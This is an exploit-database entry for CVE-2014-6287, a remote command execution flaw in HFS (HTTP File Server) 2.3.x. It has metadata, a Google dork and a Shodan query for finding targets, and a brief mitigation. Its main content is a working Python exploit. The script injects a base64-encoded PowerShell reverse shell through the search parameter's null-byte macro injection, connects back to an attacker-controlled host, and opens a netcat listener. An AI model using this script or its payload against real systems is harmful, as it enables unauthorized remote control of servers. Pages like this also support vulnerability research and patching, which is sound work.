HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)

vendor:

HFS (HTTP File Server)

by:

Pergyz

9.8

CVSS

CRITICAL

Remote Command Execution

CWE

Product Name: HFS (HTTP File Server)

Affected Version From: 2.3

Affected Version To: 2.3.x

Patch Exists: YES

Related CWE: CVE-2014-6287

CPE: cpe:2.3

Metasploit:

Other Scripts:

Tags: packetstorm,msf,cve,cve2014,hfs,rce,kev

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Nuclei References: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287, http://www.kb.cert.org/vuls/id/251276, http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html, https://github.com/rapid7/metasploit-framework/pull/3793, https://nvd.nist.gov/vuln/detail/CVE-2014-6287

Nuclei Metadata: {'max-request': 1, 'shodan-query': 'http.favicon.hash:2124459909', 'verified': True, 'vendor': 'rejetto', 'product': 'http_file_server'}

Platforms Tested: Microsoft Windows Server 2012 R2 Standard

2021

HFS (HTTP File Server) 2.3.x – Remote Command Execution (3)

This exploit allows an attacker to execute arbitrary commands on a target system running HFS (HTTP File Server) version 2.3.x. The vulnerability exists due to improper handling of user input, which allows an attacker to inject malicious commands. By exploiting this vulnerability, an attacker can gain unauthorized access and execute commands with the privileges of the HFS application.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of HFS (HTTP File Server) and ensure that input validation and sanitization mechanisms are implemented properly.

Source

Exploit-DB raw data:

# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands

#!/usr/bin/python3

import base64
import os
import urllib.request
import urllib.parse

lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80

# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'

# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")

# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'

# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")

# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)

# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')